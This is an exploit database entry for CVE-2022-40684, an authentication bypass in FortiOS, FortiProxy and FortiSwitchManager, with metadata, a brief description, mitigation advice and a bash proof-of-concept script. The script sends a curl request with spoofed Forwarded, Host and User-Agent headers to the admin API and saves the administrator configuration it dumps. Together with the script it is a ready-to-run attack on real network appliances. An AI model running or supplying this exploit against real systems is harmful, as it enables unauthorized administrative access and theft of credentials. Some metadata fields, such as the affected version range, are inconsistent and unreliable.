Fortinet Authentication Bypass v7.2.1 - (FortiOS, FortiProxy, FortiSwitchManager)

vendor:

FortiOS, FortiProxy, FortiSwitchManager

by:

Felipe Alcantara (Filiplain)

8.8

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: FortiOS, FortiProxy, FortiSwitchManager

Affected Version From: 7.2.2000

Affected Version To: 7.0.6

Patch Exists: YES

Related CWE: CVE-2022-40684

CPE: a:fortinet:fortios:7.2.1

Metasploit: https://www.rapid7.com/db/vulnerabilities/fortiproxy-cve-2022-40684/, https://www.rapid7.com/db/vulnerabilities/fortios-cve-2022-40684/

Other Scripts:

Tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev,intrusive

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Nuclei References: https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py, https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/, https://socradar.io/what-do-you-need-to-know-about-fortinet-critical-authentication-bypass-vulnerability-cve-2022-40684/, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684, https://nvd.nist.gov/vuln/detail/CVE-2022-40684

Nuclei Metadata: {'max-request': 2, 'vendor': 'fortinet', 'product': 'fortiproxy'}

Platforms Tested: Kali Linux

2022

Fortinet Authentication Bypass v7.2.1 – (FortiOS, FortiProxy, FortiSwitchManager)

A vulnerability in Fortinet products allows an attacker to bypass authentication and gain access to the system. This vulnerability affects FortiOS from 7.2.0 to 7.2.1, FortiOS from 7.0.0 to 7.0.6, FortiProxy 7.2.0, FortiProxy from 7.0.0 to 7.0.6, FortiSwitchManager 7.2.0, and FortiSwitchManager 7.0.0. An attacker can exploit this vulnerability by sending a specially crafted request to the target system. Successful exploitation of this vulnerability can result in unauthorized access to the system.

Mitigation:

Users should upgrade to the latest version of Fortinet products to mitigate this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Fortinet Authentication Bypass v7.2.1 - (FortiOS, FortiProxy, FortiSwitchManager)
# Date: 13/10/2022
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.fortinet.com/
# Version:
#FortiOS from 7.2.0 to 7.2.1
#FortiOS from 7.0.0 to 7.0.6
#FortiProxy 7.2.0
#FortiProxy from 7.0.0 to 7.0.6
#FortiSwitchManager 7.2.0
#FortiSwitchManager 7.0.0
# Tested on: Kali Linux
# CVE : CVE-2022-40684

# https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass

# Usage: ./poc.sh <ip> <port>
# Example: ./poc.sh 10.10.10.120 8443

#!/bin/bash

red="\e[0;31m\033[1m"
blue="\e[0;34m\033[1m"
yellow="\e[0;33m\033[1m"
end="\033[0m\e[0m"

target=$1
port=$2

vuln () {

echo -e "${yellow}[+] Dumping System Information: ${end}"

timeout 10 curl -s -k -X $'GET' \
    -H $'Host: 127.0.0.1:9980' -H $'User-Agent: Node.js' -H $'Accept-Encoding\": gzip, deflate' -H $'Forwarded: by=\"[127.0.0.1]:80\";for=\"[127.0.0.1]:49490\";proto=http;host=' -H $'X-Forwarded-Vdom: root' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' "https://$target:$port/api/v2/cmdb/system/admin" > $target.out
if [ "$?" == "0" ];then
 grep "results" ./$target.out >/dev/null
 if [ "$?" == "0" ];then
    echo -e "${blue}Vulnerable: Saved to file $PWD/$target.out ${end}"
 else 
    rm -f ./$target.out
    echo -e "${red}Not Vulnerable ${end}"
 fi

else

  echo -e "${red}Not Vulnerable ${end}"
  rm -f ./$target.out

fi


}

vuln